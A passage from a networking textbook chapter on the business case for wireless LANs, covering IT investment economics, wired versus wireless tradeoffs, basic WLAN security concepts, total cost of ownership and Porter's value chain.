payback period, Net Present Value, and internal rate of return are described in detail.
Aligning Technology Solutions with Business

Considerations
Even though wireless networks form a very specific subset of information technology assets, several
high-level considerations are required before making the decision to pursue a concrete design and
implementation of a WLAN in your ecosystem. These considerations encompass both business and
technology considerations, and they are not necessarily unique to WLANs. Indeed, whenever an
investment opportunity or requirement is present, similar deliberations must be made. Examples include
what the rationale for the investment is, what the scope is, how much capital outlay will be required,
what the timing of these outlays is, what kinds of returns should be expected, and so on. The same
considerations can be made whether you are making an investment in information technology,
manufacturing equipment, real estate, or bonds.
There are, however, subtle differences when it comes to information technology infrastructure
investments for two reasons:
IT infrastructure is typically a sunk cost.
IT infrastructure is an enabler of higher-order solutions.
First, after IT infrastructure investments are made, they should be considered sunk costs, which cannot
be recovered. This is because the average shelf life of today's IT assets is relatively short, even though
the asset might be usable for a relatively long time. The key point to consider is the economic value, not
the life span of usability of the asset. Many IT products have economic life spans of one to three years,
after which they have no residual economic value. The lack of residual value does not, however, imply
that the asset can no longer be used.
Consider a similar example of a car. The fair market value of an automobile that is 7 to 10 years old is
almost non-existent. Nonetheless, assuming that the vehicle remains in good operating condition, the
car can continue to be driven until it physically breaks down. As such, the cost of the car is sunk after it
has reached a certain age, but this does not mean that it is no longer usable.
Now consider a real-estate investment such as a building or land. These costs are not considered sunk
because the initial cost can be recovered many years after the purchase has occurred. The residual value
of these assets remains relatively constantin fact, we often hope that these assets appreciate.
A second difference relating to investments in IT infrastructure is that by design, infrastructure forms the
foundation upon which many higher-order solutions rest, including applications such as Customer
Relationship Management (CRM), Enterprise Resource Planning (ERP), and e-mail applications. The
applications support business processes that in turn help an organization to achieve its primary goals. IT
infrastructure thus not only becomes a core business enabler, but is often considered a core business
necessity in today's information-driven world.
The organizational ecosystem can thus be deconstructed into several independent, tightly coupled
layers, as shown in Figure 2-1. At the very bottom, the infrastructure assets enable data transformation,
storage, and transport. These infrastructure assets are used by applications such as e-mail, web
services, CRM, ERP, and many others that give the information meaning.
Figure 2-1. The Organizational Ecosystem
In their turn, the applications support various transactional, analytical, and collaborative processes.
Transactional processes ensure that one activity in a sequence is committed before proceeding to the
next one. Analytical processes create, mine, and destroy data. Collaborative processes make it possible
to share information. Note that it is the collaborative process that actually creates real value because
information in isolation has none. What is the value of a book that nobody reads? What is the value of an
idea if nobody is aware of it?
At the very top, the organization has its specialized, dedicated teams that use the various processes to
help the organization achieve its goals. Examples of corporate goals are increasing shareholder value,
serving customers, providing employees with a superior working environment, and helping the
community.
The flow of information in the institutional ecosystem creates a dynamic, fluid environment through
which information flows with varying velocities. The ultimate purpose of acquiring, interpreting, and
manipulating this information is to enable the institution to act upon it and adjust to changing conditions
in the pursuit of its goals. For this to happen in a timely and relevant fashion, several criteria need to be
fulfilled:
You must understand the external environment in which the organization exists.
You must be thoughtful of the internal constituents that make up the organization.
You must align internal and external elements so that you can identify and manipulate the relevant
levers to effectively respond to the external environment.
Today, WLANs form an integral part of the IT infrastructure portfolio. However, it is not always clear
whether this transport asset is relevant for any given organization. Indeed, when considering WLANs,
you need to answer four basic questions:
Why are WLANs relevant to support my organizational goals?
What benefits should I target or expect?
Where should I deploy the WLANs?
How should I implement and operate the WLANs?
The remainder of this chapter covers the business-technology alignment challenge and arms you with
the necessary tools to tackle and answer the first two questions. The following chapters cover the third
and fourth questions.
Economic Considerations
In general, organizations exist to create value. The value creation process can take on many different
forms, including the production of goods and materials in the manufacturing industry, the care of
patients in the healthcare industry, the safekeeping and growth of financial assets in the financial
services industry, and the sharing of knowledge in the academic world. The value can be tangible, as in
the production of an automobile, or intangible, as when sharing knowledge.
To be effective at value creation, organizations must invest in tools that directly (or indirectly) support
the value creation process. IT infrastructure assets are such tools. At a high level, investments in IT
infrastructure assets are made to provide the organization with enabling tools to increase productivity
and flexibility. Increasing productivity can be thought of as extending the leverage of other assets such
as property, plants, equipment and human, intellectual, and brand capital. Greater flexibility implies a
better ability to sense and respond to internal and external changes that directly affect the organization.
In the context of WLANs, the key question that you need to answer is this: "How can WLANs aid my
organization in the value-creation process?"
To effectively and successfully answer this question, implement the following top-down approach:
Step 1.
Understand your organizational ecosystem.
Step 2.
Define the problem that you are trying to

solve.
Step 3.
Break the problem down.
Step 4.
Define the WLAN-enabled solution.
Figure 2-2 illustrates the discrete steps that need to be taken. The next sections describe each step in
detail.
Figure 2-2. Determining the Economic Value of Your WLAN
Step 1: Understand Your Organizational Ecosystem
Every organization is subject to forces of change. These forces can come from inside the
organizationinternal driversor from outside the organizationexternal forces. The combination of the
organization, the external constituents that are directly related to your organization, and the internal and
external forces makes up the ecosystem in which your organization operates.
Strategy consultants employ a variety of frameworks to structure and facilitate the comprehension of the
organizational ecosystem. Example frameworks include the three Cs (Customer, Company,
Competition), low-cost versus niche player, and internal-external factors.
When an understanding of internal factors and external considerations has been developed, you are
ready to tackle the following step.
Step 2: Define the Problem That You Are Trying to Solve

Given the dynamics of your specific organization, what value do you expect the WLANs to deliver? Note
that this question does not necessarily constrain itself to trivial answers such as "Enhancing
communications and connectivity." Indeed, armed with the knowledge acquired in the first step, your
answer can be made not only much more relevant for your organization but also much more specific.
Two examples clearly illustrate this point. In the summer of 2001, Starbucks Corporation, a company
known for serving coffee through its worldwide retail outlets, commenced deploying WLANs in its retail
outlets. It is arguable that the value proposition for installing WLANs in the retail outlets was to make the
baristas more productive.
Starbucks' management identified the value of providing WLAN-enabled Internet access to its customers
in another domain. By providing customers with easy-to-use Internet access, Starbucks hopes to
enhance and extend the customer's experience with the ultimate goal of serving him or her more coffee.
As such, the value proposition of WLANs to Starbucks becomes increased revenues through more
satisfying (repeat business) and longer (more servings) customer visits. The problem that Starbucks
Corporation solved with WLANs is this: "How can Starbucks enhance the experience of customers to
increase repeat business and make them consume more Starbucks' products?"
A second example is that of Lifespan, which is featured in Chapter 10, "Healthcare Case Study." Wireless
networks formed an integral part of Lifespan's IT infrastructure strategy as early as 1997. The challenge
that Lifespan tackled was providing timely information access throughout the healthcare continuum.
The nature of healthcare is such that physicians and nurses cannot be tethered. They must be able to do
rounds, go to clinics, and visit libraries. A challenge arises in that hospital staff must be able to access
applications for patient information while remaining mobile. As such, the goal becomes finding a solution
to get applications closer to the mobile physicians and the point of care of the patient.
The problem that Lifespan solved with WLANs is this: "How can Lifespan provide its physicians and
nurses with relevant and timely information at the point of care of patients to increase customer
satisfaction through delivery of safer, higher-quality healthcare?" Chapter 10 is dedicated to a case study
of WLANs in the healthcare environment and specifically covers the rationale that Lifespan developed for
deploying WLANs.
After you accurately define the problem, the next step is to break the complex problem down into
simpler, more manageable components.
Step 3: Break the Problem Down

As you learned in the second step, organizations primarily address two different types of problems with
WLANs:
Increasing revenues, as was the case for Starbucks
Increasing productivity and accuracy of staff, as was the case for Lifespan
You could argue that productivity and revenues are directly related and, hence, imply the same goal.
The goal might be the same. After all, the majority of organizations strive to increase profitability by
increasing revenue and decreasing expenses. The methods for achieving the goal, however, can be very
different. This becomes clear when you deconstruct the problem to more specifically identify how your
organization benefits from WLANs. Breaking down the problem not only makes the identification of a
specific value-proposition easier, but it also reduces the risk of oversight.
Four different dimensions are relevant when evaluating business challenges: strategic, operational,
financial, and technological. Keep in mind that the WLAN's value-proposition that you are attempting to
pinpoint is not necessarily limited to a single dimension. Indeed, it will typically span at least two
(strategic and technological) of them. A sample of drivers for WLANs in each of the four dimensions
follows.
Strategic drivers include the following:
Provide high-speed mobile access/availability to information.
Increase employee productivity.
Facilitate and enhance collaboration.
Improve response times to stakeholders (customers, coworkers, and suppliers).
Provide richer communications capabilities.
Enhance customer experience.
Increase customer satisfaction.
Increase customer loyalty.
Improve aesthetics (no dangling wires).
Operational drivers include the following:
Simplify management of network infrastructure.
Provide connectivity in temporary locations.
Avoid difficult cabling situations.
Provide scalable connectivity (avoid insufficient data ports).

Financial drivers include the following:
Obviate cabling costs.
Avoid circuit expenses (WLAN inter-building bridges).
Reduce equipment cost for sporadically used spaces (meeting rooms and common areas).
Technological drivers include the following:
Provide communications infrastructure for mobile devices.
Enable mobility for wireless applications.
Interconnect heterogeneous platforms, devices, and applications.
Figure 2-3 illustrates the four dimensions you need to consider when assessing the value proposition of a
WLAN.
Figure 2-3. Identifying the Value Proposition of Your WLAN
Step 4: Define WLAN-Enabled Solution

After you define and understand the problem to be solved, a WLAN solution can be constructed. Chapter
3, "Preparation and Planning," provides you with a structured approach for doing this. However, prior to
launching this phase, you need to understand what the role of WLANs is in your organization as well as
how to demonstrate the business value to your stakeholders. This is covered next.
The Role of Infrastructure

As mentioned earlier in this chapter, the environment in which a company or institution operates can be
broken down into interdependent blocks to create a layered model not so different from the OSI model.
Each building block can subsequently be broken down into discrete components to further deconstruct
and model the corporate and IT ecosystem.
At the infrastructure layer, a simplified distinction can be made between three different classes of IT
assets:
Compute assets These assets manipulate and transform information. Servers and personal
computers (PCs) fall within the compute asset class.
Storage assets Storage assets exist to collect and warehouse information. Disk arrays, CDs,
DVDs, and tape libraries are all examples of storage assets.
Transport assets Transport assets ensure that information can be moved from their point of
origin or safekeeping to a point of consumption. Different kinds of communications networks such
as the Public Switch Telephone Network (PSTN), WANs, LANs, and the technologies of choice for
their implementation such as routers, switches, hubs, and firewalls are all examples of transport
assets.
Figure 2-4 illustrates the different asset classes of the IT infrastructure layer.
Figure 2-4. IT Infrastructure Assets
These asset classes exist regardless of the syntax or semantics of the datathat is, the classes are
independent of how the information is represented and what its meaning is. Also note that the classes
do not necessarily imply an electronic nature. Indeed, customer data on a paper document can be
transformed by a pencil, stored in a filing cabinet, and transported through the postal service. For the
purpose of this book, however, we shall ignore analog representations and focus solely on the digital
world.
Although the economic value of the information can vary widelya meeting invitation e-mail is probably
much less valuable than a product order or annual budgeting dataits core utility is constant. Information
enables companies to sense and respond to changing business environments, thus facilitating the
creation and sustenance of a competitive advantage. Similarly, information allows healthcare institutions
to provide relevant, accurate, and timely care to patients. Finally, information in educational institutions
arms the next-generation work force with the tools necessary to support the economy and drive
continued growth through ongoing innovation.
Given the importance of information, it is critical to design an infrastructure that effectively, efficiently,
and securely supports the transactional, analytical, and collaborative use of data. As such, the challenge
at hand is one of aligning technology solutionsmore specifically the IT infrastructure portfoliowith
business requirements.
Pros and Cons of the Wired Versus Wireless World

WLANs can be considered a specific subset of the IT transport assets. This type of asset is dedicated to
and specialized in the transfer of information from a point of origin to a point of consumption or storage.
Note, however, that this transport asset class contains many different communications network
solutions. Examples include the GSM or CDMA networks used for cellular communications; data
networking solutions such as WLAN, Ethernet, and SNA for local-area networks; and Frame Relay, ATM,
and SONET for wide-area networks.
Chapter 1, "Introduction to Wireless LAN Technologies," introduced the OSI reference model and
employed the lower two layers (physical and data link) to provide a means of distinction and
classification between the various types of networks. This section focuses on the subset that is relevant
to WLANsthat is, local-area networks.
WLANs employ the unshielded, unbounded carrier mechanism of radio waves, as opposed to the
unshielded or shielded but bound transport channel of wired networks. Indeed, wired networks use
either electrical or photonic signals that are tunneled through a bearer medium. This unbounded versus
bounded nature is the key difference between wireless and wired LANs. The organizational pros and cons
related to this difference are discussed next.
Mobility: Pro
The unbounded nature of WLANs makes them pervasive within the coverage area. As such, you are not
forced to locate and remain tethered to a network outlet. Your three-dimensional roaming domain is
equal to the WLAN coverage area. In the wired world, your roaming ability is restricted by the tether. It
is equal to the volume of the sphere with a radius equal to the length of the cable that connects your
NIC to the network drop. That is the very best-case scenario. In practice, physical obstacles such as
furniture, doors, and walls will make this reach much smaller.
Contrary to the wired world, the connectivity footprint in the wireless world is not limited to the network
outlet. It is equal to the reach of the radio cloud, or more specifically, to the reach of your Basic Service
Set (BSS). This untethered character makes WLANs ideal for environments that require fluid,
transparent movement of computing assets. The value of mobility thus translates into convenience and
reduced downtime, which in turn can translate into increased productivity. Figure 2-5 illustrates the
difference in physical reach and mobility between wireless and wired networks.
Figure 2-5. Wireless and Wired Connectivity Footprints
Mobility is a key benefit in many different environments as it enables individuals to do their work when
and where it is convenient for them, thus directly boosting productivity.
In the knowledge-worker corporate world, the ability to swiftly pick up and move between locations
while retaining access to information reduces employee downtime and facilitates collaboration. Note that
this concept is not bound to the confines of the corporate offices. WLAN hotspots in airport lounges,
coffee shops, and hotels, and airplanes enable road warriors to obtain network access at their
convenience throughout the business day. By supplementing WLANs with wide-area wireless cellular
networks, the business traveler will soon be able to remain connected continuously throughout his or her
journeys. Figure 2-6 and Figure 2-7 illustrate the evolution of connectivity options at various stages of a
typical business trip.
Figure 2-6. Today's Mobile Connectivity Options
Figure 2-7. Tomorrow's Mobile Connectivity Options
Another example is the world of education. Students are highly mobile. They move between dorm
rooms, classrooms, study rooms, and libraries. Because many of today's students are armed with
laptops, the value of mobility of the computing asset is vastly increased by complementing it with a
transparent, flexible and mobile communications solution. Note that the same is true for teaching staff
who roam between their offices, classrooms, and meeting rooms. The ability to remain connected
anytime and anywhere vastly increases the ease of use, and hence the productivity, of mobile computing
devices.
The hospital environment requires that physicians and nurses have patient information available at the
point of care. By their bringing the computing environment to the mobile users, the probability that the
healthcare professionals will use the IT tools provided greatly increases. As such, the quality and safety
of healthcare is increased through accelerated access to and recording of patient information at the point
of care. Refer to Chapter 10 for a case study of WLANs in the healthcare environment.
Convenience: Pro
The source of convenience for WLANs can be found in the shared nature of the communications medium.
Indeed, contrary to the fan-out ratio of one user per wired LAN endpoint, the fan-out ratio for access
points of WLANs is theoretically unlimited. Many different users can associate with the same access point
without running into the situation of insufficient data ports.
Note
The fan-out ratio is the ratio of available network connections to users of the connections.
In practice, there is an acceptable access point fan-out ratio of approximately 30:1. This is a direct result
of the MAC mechanism. When too many stations are attached to the same AP, increasing contention for
network access will yield a deadlock situation in which no station can successfully send or receive either
because of the inability to obtain airspace access or because of frame collisions.
The upper limit of fan-out aside, WLANs provide a very flexible solution for providing a high number of
mobile devices with network access. This is ideal in situations where many different individuals (or
devices) require network connectivity. Examples include meeting rooms, classrooms, and public
hotspots such as airport lounges and coffee shops.
In addition, by using WLANs, you avoid the aesthetic wiring nightmare of using ad-hoc hubs or switches
to increase the fan-out of wired solutions. Finally, you avert the risk of encountering the situation in
which you do have a free data port, but you have no cable to plug into it.
Bandwidth: Con
WLANs do not offer the same bandwidth that is available in wired networks. Although you encounter port
speeds of up to 10 Gbps in today's wired LANs, WLANs are currently limited to 54 Mbps. The reasons are
mainly related to the physical characteristics of the bearer mediumthat is, radio instead of electrical or
photonicand the fact that WLANs are typically used in a shared operating mode. As such, it is critical to
consider the bandwidth and quality of service (QoS) implications when evaluating WLANs. First, available
WLAN bandwidth is orders of magnitude less than what is available with wired networks. Second, WLAN
bandwidth is shared among wireless stations. Real available throughput thus becomes a fraction of the
WLAN's nominal throughput. Finally, because WLANs are a best-effort transport solution, additional
considerations are required to provide some form of QoS determinism for latency-sensitive applications.
When a device is directly connected to a switch port, the communication medium is dedicated to that
device. This dedicated connectivity is only achieved in the WLAN environment if a single device is
associated with an AP. As such, bandwidth consideration should always be made with the shared nature
in mind.
Note
Strictly speaking, in 802.11even when the AP has a singular clientthe AP and the client share
the same medium when communicating with one another. In Ethernet, separate wires enable
simultaneous bidirectional or full-duplex communication.
Note that the size of the pipe is not the only important parameter. Determining the amount of time
required to get access to the transport medium and the probability for successful transmission (that is,
no collisions) are also of key importance. The MAC characteristics of WLANs are such that no guarantees
are made in terms of timely delivery.
As such, additional intelligence is required to provide the relatively predictable network throughput,
latency, and jitter that is required by real-time and interactive data flows. QoS refers to the ability of a
network to provide these higher-priority services and improved loss characteristics to selected network
traffic. IP makes use of Layer 3 mechanisms such as IntServ or Diffserv. The IEEE 802.11e working
group ratified the mechanism for providing Layer 2 class of service (CoS) mechanisms for WLANs in July
2005.
Note
Class of service (CoS) is part of the portfolio of QoS techniques, which also includes queuing,
bandwidth reservation, and traffic engineering strategies. CoS is a way of classifying packets
based on application type (voice, video, file transfer, transaction processing, etc.), user type,
or any other classification method. The different classes can then be assigned different
handling priorities.
802.11e provides the mechanism for injecting more deterministic behavior into the queuing and MAC
protocols for WLANs. The goal is to provide a more robust foundation for QoS and increase the support
of WLANs for latency- and jitter-sensitive applications such as IP Voice and IP Video.
The bandwidth and QoS limitations should not be taken lightly. As more high-bandwidth and latencysensitive applications come online, the provisioning of appropriate capacity becomes critical. IP
Telephony and high-bandwidth video applications are prime examples.
Effect on Cost and Spending

To perform a relevant cost comparison between wired and WLAN solutions, three distinct deployment
scenarios must be considered:
Exclusively wired LANs
Exclusively wireless LANs
The hybrid version in which both wired and wireless connections are provided
Note
WLANs typically employ wired connections to connect APs to the LAN backbone. As such, the
distinction between the three LAN environments is based on the connection that is offered to
the end user device.
It is critical to realize that all cases are tradeoffs. The cost per end-user connection is lower for WLANs
than for their wired counterparts because of the shared nature of the connectivity medium. However, the
cost of bandwidth per end user for WLANs is significantly higher than for wired environments.
Furthermore, this cost increases approximately linearly as a function of the number of end users that are
associated with the AP.
Lastly, an opportunity cost is associated with the inability to connect an end user to a network. The basic
premise is that a user requires connectivity to perform a function or task. An opportunity cost is the loss
of benefits of a forgone opportunity. For example, if you quit your job to return to school, you incur an
opportunity cost of lost income while you pursue your studies.
In the case of WLANs, the task in turn contributes to a particular benefit or contribution of the user.
Examples include increasing revenues, lowering unit costs, boosting customer satisfaction, and sharing
information. Failure to perform these tasks has a quantitative or qualitative cost, which is referred to as
the opportunity cost.
The usable fan-out ratio of APs is approximately 30:1. Hence, the probability that an end station will not
be able to obtain basic connectivity, even though throughput might be quite low, is relatively low. The
opportunity cost associated with the inability to connect approaches zero. In contrast, wired connectivity
has a fan-out ratio of 1:1. If the connection is in use, no other edge station can attach without
completely disrupting the first user. The opportunity cost is greater than zero. Depending on the task
that is prohibited from being completed, the opportunity cost can be low to very high.
For example, if you want to connect to check whether you received an invitation for a meeting that will
take place in two weeks, your opportunity cost of not being able to connect is relatively low. If, however,
you are engaged in a timed auction on eBay for a new motorcycle, the opportunity cost associated with
not being able to adjust your bid is at least equal to your reservation pricethat is, the maximum price
you are willing to pay. It could be higher if the motorcycle has a qualitative (for example, emotional)
value for you.
With the aforementioned in mind, now take a look at the different deployment scenarios.
Wired-Only LAN
The benefit of a wired LAN is that it offers end users high throughput per port. Today, dedicated 100Mbps connectivity has become the norm for corporate LANs. Throughputs of 1 Gbps are common in the
data center environment, with 10 Gbps gaining increased traction.
However, the dedicated throughput per port comes at the price of the limited fan-out ratio of the
connection. Indeed, in a wired-only environment, the ratio of end-user devices to connections is 1:1. As
such, a potentially large opportunity cost is associated with wired-only connectivity if it is deployed in
environments where many end users might require simultaneous connectivity. Meeting rooms, lecture
halls, and public hotspots are prime examples of such scenarios. Figure 2.8 summarizes these points in
a performance scoreboard for 100 Mbps, 1 Gbps and 10 Gbps wired networks. The axes represent
throughput, cost per end-user connection, and risk of unavailability of network outlet. Note that the
scales of the axis are logarithmic.
Figure 2-8. Wired-Only Connectivity Profile
Wireless-Only LAN
The benefits of WLANs are primarily found in the mobility-enabling nature and shared nature of the
communication medium. Physical roaming is possible, as long as devices adhere to specific boundary
conditions, which are discussed in Chapter 5, "Guidelines for a Successful Architecture and Design," and
a single access, point can provide seamless network access for several end devices ranging from one to
multiple dozens.
Because of the shared nature of the communications medium, the opportunity cost of not being able to
obtain network access, is minimized. It does not, however, become zero, because the MAC mechanism
employed by WLANs precludes an infinite number of stations successfully passing through a single AP.
Finally, the shared nature of the AP leads to a relatively low (and variable) cost per end-user connection.
Figure 2-9 summarizes these characteristics for 802.11b (11 Mbps) and 802.11g (54 Mbps) WLANs.
Note that the $/end-user connection depicted is the worst-case scenariothat is, an AP with a single
userand the bandwidth is the best case (11 Mbps for 802.11b versus 54 Mbps for 802.11a and 802.11g).
Figure 2-9. Wireless-Only Connectivity Profile
Hybrid Wired and Wireless LAN

When combining both types of LANs, you arguably create an environment with the best of both worlds.
By strategically selecting the locations where wireless network access is provisioned, you enable physical
mobility and the ability to transparently share network connectivity among multiple end-user devices.
With the latter in mind, the opportunity cost of not being able to gain network connectivity is minimized.
Furthermore, if and when higher throughput is required or more stringent demands are placed on the
QoS, wired connectivity remains an available option.
When you are considering the cost per end-user connection, the hybrid model spans a range that is a
function of the degree of overlay created. If a full overlay model is selectedthat is, every point that is
provisioned with wired connectivity also has a wireless connection availablethe cost per end-user
connection will be higher than the wired-only scenario. This is the highest possible cost. Similarly, the
lowest possible cost is that in which only wireless is available. Note that in this case, the benefits of
wired connectivity are not present. As such, the hybrid model cost per end-user connection falls
somewhere in between these two extremes.
Figure 2-10 shows an example of a hybrid connectivity profile.
Figure 2-10. Hybrid Connectivity Profile
Security
You should consider security for WLANs to be a superset of the security considerations for traditional
wired LANs. In both cases, the following four distinct challenges of securing your communication session
are critical:
Network Admission Control Gaining access to the communication medium
Authentication Ensuring that the communicating parties know whom they are communicating
with
Encryption Making sure nobody else can read the information that is being sent
Hashing Certifying that nobody has tampered with or modified the messages
The wireless nature of WLANs impacts these four considerations in profound ways when compared to
their wired counterparts.
Challenge 1: Network Admission Control

Wired LANs are by nature physically bound. They employ shielded or unshielded copper wires or fiberoptic cables. Connecting to an endpoint or tapping onto the wire is a challenge because it requires
physical access. Hence, gaining access to a wired LAN can be made as difficult as obtaining access to a
facility or somehow acquiring access to subterranean communication lines.
WLANs, however, employ radio signals as the transport medium; therefore, the medium is inherently
both unshielded and unbounded. You can thus gain access to the communication medium at any point
where you can tune into the radio signal. As such, the burden of securing access to the network cannot
be placed on physical barriers but rather must be supported by other mechanisms.
WLANs resolve this challenge by using different kinds of solutions, including admission control
mechanisms such as MAC address filters and EAP authentication. These and other mechanisms are
discussed in more detail in Chapter 7, "Security and Wireless LANs."
Challenge 2: Authentication
A challenge that is common to both wired and wireless LANs is authentication of communicating parties.
Both parties need to be sure of their counterpart's identity. This challenge is specifically related to the
endpoints of communications and is independent of the transport medium and mechanism. As such, the
same degrees of importance and complexity are present in wired and wireless environments.
Note
In a wired network, the user usually be confident that the jack in the wall does not lead out to
the parking lot. Conversely, users information about physical location can be inferred from a
user attaching to a WLAN. The user can be inside the building or outside in the parking lot.
Various mechanisms exist to support authentication. Examples include using simple keys (symmetric or
asymmetric) and more complex digital signatures. Chapter 7 covers these topics in more detail.
Challenge 3: Encryption
Encryption is the process of converting or scrambling a message to something incomprehensible using a
locking key so that it can be reconverted only by an authorized recipient holding the unlocking key.
Think of the process as putting the message in a safe, locking it with a padlock, and sending the safe to
a recipient who is the only other person who can unlock the padlock and open the safe.
Because of the broadcast nature of WLANs, every station that can tune into the signal emitted by
another station can "listen in" on the communication session. As such, you should be aware of the
consequences and risks of sending information in clear text over WLANs. The risk is more elevated than
in wired LANs where tapping is explicit versus implicit in the case of WLANs. However, this
implicit/explicit listening capability is the only true difference between the wired and wireless
environment.
To avoid unintentional or intentional tapping of the communication sessions, you should use ciphers in
your wireless environment to scramble the transmissions in such a way that the information is only
meaningful to the sender and receiver of the information. The same considerations should be made for
wired environments when selecting encryption algorithms. Consult Chapter 7 for more detailed
coverage.
Challenge 4: Hashing
A final risk that exists in communication is that of a third party modifying the message while it is in
transit. The broadcast nature of WLANs eases not only the tapping of communication sessions but also
the ability to inject bogus messages. To identify messages that have been tampered with, you append a
tag to the message. The tag is a mathematical summary of the message. The process of summarization
is called hashing. Upon receipt, the receiver reconstructs the tag and compares it to the sender's tag to
determine whether the message has been tampered with.
Note
Hashing is the creation of a one-way mathematical summary of a message such that the hash
value cannot (easily) be reconstituted back into the original message, even with knowledge of
the hash algorithm.
For identical reasons as mentioned for encryption, the importance of hashing is greater in WLANs than in
wired environments. Refer to Chapter 7 for more details on hashing.
Measuring the Business Value of Deploying Wireless

Identifying and understanding the qualitative and quantitative benefits of investments are key
prerequisites to deciding whether to proceed with those investments. This holds true independent of the
investment that is being considered. Indeed, when considering investments in financial instruments such
as stocks and bonds, deliberations are made about tangible benefits (quantitative benefits), such as
expected returns, in addition to intangible benefits (qualitative benefits), such as familiarity with the
markets for the securities, and finally the different risks (capital, market, and operational) associated
with the instruments.
The same rationale is applicable for WLANs. When constructing your business case for WLANs, you need
to consider three distinct dimensions:
Quantitative benefits These financial opportunities (that is, the possibility to monetize the
benefits enabled by your WLAN) consist of direct savings through reduced capital and operational
expenditures and indirect savings of opportunity costs.
Qualitative benefits Examples of qualitative benefits include increased comfort and productivity,
improved aesthetics, and strategic aspects such as enabling upstream mobile applications.
Risks The risks associated with your WLAN project are related to executing the project
(implementation risk), operating the WLAN infrastructure (risk of disruption), and securing the
project (risk of loss and theft).
Even though ROI typically refers only to a quantitative analysis, a mutually exclusive and collectively
exhaustive (MECE) approach necessitates that not only the quantitative but also the qualitative
parameters and the risks of the investment are considered. A choice can then be made about the
relative weights or importance attributed to each respective benefit. Indeed, you do not select a portfolio
of financial instruments solely on expected returns without, for example, considering your familiarity
with the underlying market for the instruments.
In the IT world, ROI typically refers to the financial assessment of an IT project. This assessment would
be more correctly denominated as a cost-benefit analysis. The more appropriately named cost-benefit
analysis (CBA) is a method of measuring the quantitative yield of an investment in IT assets. To avoid
confusion we shall continue to use the terms ROI and cost-benefit analysis interchangeably.
When performing a cost-benefit analysis of an investment, you need to closely examine two distinct
areas:
The numerator of the ratiothat is, the costs associated with the investment
The denominator, which quantifies the benefits associated with the investments
Only when both factors have been determined can a decision be made about whether the quantified
benefits outweigh the quantified costs. Note the word "quantified" in the previous sentence. As we shall
see, there are several costs and benefits that are either very challenging or all but impossible to
quantify. An exhaustive consideration requires that these softer parameters are indeed considered in
making a business decision. No information about physical location can be inferred from a user attaching
to a WLAN. The user can be inside the building, or outside in the parking lot.
The following sections explore the quantitative and qualitative elements of WLANs in more detail. Finally,
given the importance of financial metrics in today's business environment, we take a closer look at
decision metrics.
Total Cost of Ownership

In the context of IT investment, an often-used term is the total cost of ownership (TCO) of the IT asset.
This measure reflects all costs associated with the entire lifecycle of the asset.
As you learn in Chapter 3, the WLAN technology lifecycle can be modeled with the preparation, planning,
design, implementation, operation, and optimization (PPDIOO) solutions lifecycle. As such, you need to
identify the costs related to the PPDIOO lifecycle of your WLAN. The corresponding expenses will include
the capital expenditures (CAPX), assuming the WLAN assets will be capitalized; the one-time costs of
preparing, planning, designing, and implementing your WLAN and training the WLAN users; and the
recurring costs of maintaining and upgrading the WLANthat is, operation and optimization.
Table 2-1 provides a breakdown of the various WLAN cost components. The table is not intended to be
exhaustive and provides a nominal approximation only. The sum of these terms yields the WLAN's TCO.
Table 2-1. Total Cost of Ownership Components

Stage
Type
Item
CAPX
Hardware
Access points
LAN switches
Management consoles
WLAN NICs
Power cords
Cabling
Authentication servers
Network administration/security tools
Software
AP software licenses
LAN switch OS licenses
Management console licenses
End-user licenses
WLAN management tools
Stage
Type
Item
Authentication server software
Finance
Cost of capital
Preparation
Program
management
WLAN program team resources
Planning
Program
Management

Site surveys
Design
Program
management

Engineering resources
Consulting
services
Implementation Program
management
Installation
Engineering services
Internal engineering resources
External engineering services
Training
Operations staff
End users
Operation
Support
WLAN management staff

Maintenance
Optimization
Support
WLAN management staff

Upgrades
Currently, the per-user TCO of a WLAN is higher than for a wired LAN. This difference is due to the
operational and administrative costs of WLANs, which are typically two to three times higher than for
wired LANs. As a result, WLANs should be considered mainly for their mobility and connectivity options
and not for enabling savings in IT budgets. Over time, the TCO gap should narrow. Because of this
current nominally higher TCO of WLANs, it is critical to identify the types and sizes of benefits that a
WLAN can enable.
Value of Ownership
You need to ask two key questions when attempting to identify the benefits your organization can
extract from WLANs:
Where in the organizational ecosystem can WLANs have a positive impact?
How will a WLAN positively influence the identified areas by the first question?
For the purpose of this book, we shall focus on corporate business ecosystems. The same logic can be
extended to educational institutions, albeit with slight modifications to the frameworks that will be
discussed in the following sections.
Question 1: Where in the Organizational Ecosystem Can WLANs Have a Positive Impact?
A framework that is highly applicable when determining where a WLAN will have a positive impact in
your organizational ecosystem is the Value Chain framework developed by Michael E. Porter, university
professor at the Harvard Business School, where he leads the Institute for Strategy and Competitiveness
Porter describes the framework in his 1985 book Competitive Advantage: Creating and Sustaining
Superior Performance. The framework depicts an organization as an interlinked set of primary and
secondary activities that create and build value. Figure 2-11 illustrates Porter's Value Chain framework.
Figure 2-11. The Value Chain Framework Adapted from Michael E. Porter
Competitive Advantage, 1985
Consider three different industries: manufacturing, consumer retail, and financial services. This
discussion first focuses on the primary activities because this domain exhibits the greatest variability
among the selected industries when it comes to the application of WLANs. Note that the distinctions are
based on highly simplified views of the respective industries and only serve to illustrate the logic behind
the identification of key application areas of WLANs in the respective organizations.
Primary Activities
The manufacturing industry is characterized by the necessity for excellence in inbound logistics,
operations, and warehousing of finished goods. As goods move through the value chain, the physical
attributes of the goods change. The information associated with these goods changes in accordance with
the transformations applied. The shop floor thus becomes a prime candidate for being enabled with
WLANs. WLANs can help untether logistics and warehousing applications, thus simplifying real-time
production updates, wireless asset tracking, quality assessment, and inventory logging.
In the consumer retail industry, the primary focus areas are outbound logistics (warehousing,
transportation, distribution, and store operations) and marketing and sales. The consumer retail industry
has been a relatively early adopter of wireless solutions because mobile devices help automate the
supply chain. Handheld scanners are used to receive inventory into the store, validate shelf-label pricing,
perform markups and markdowns, carry out item counts, and do store transfers.
As higher bandwidth becomes available, the wireless applications move up the value chain to sales- and
marketing-related functions. Customer-facing activities such as line busting, sales assist activities, and
finding product information for the customer can be greatly enhanced by having specific and relevant
product information available at the point of sale. Furthermore, store managers can be released from
their desks and armed with real-time information to increase their interaction with customers. WLANs
thus effectively enable managers to access performance data anywhere in the store at any level of
detail.
The third industry that we consider is financial services. The primary activities in the financial services
industry of most importance are the marketing, sales, and service activities. As such, it is clear that an
area of opportunity for WLANs exists in the financial services industry. WLANs provide the opportunity to
mobilize the front office.
A domain where mobility is a key benefit is the bank branch. Roaming staff can handle simple
transactions from anywhere in the branch. Service delivery is enhanced through rapid access to
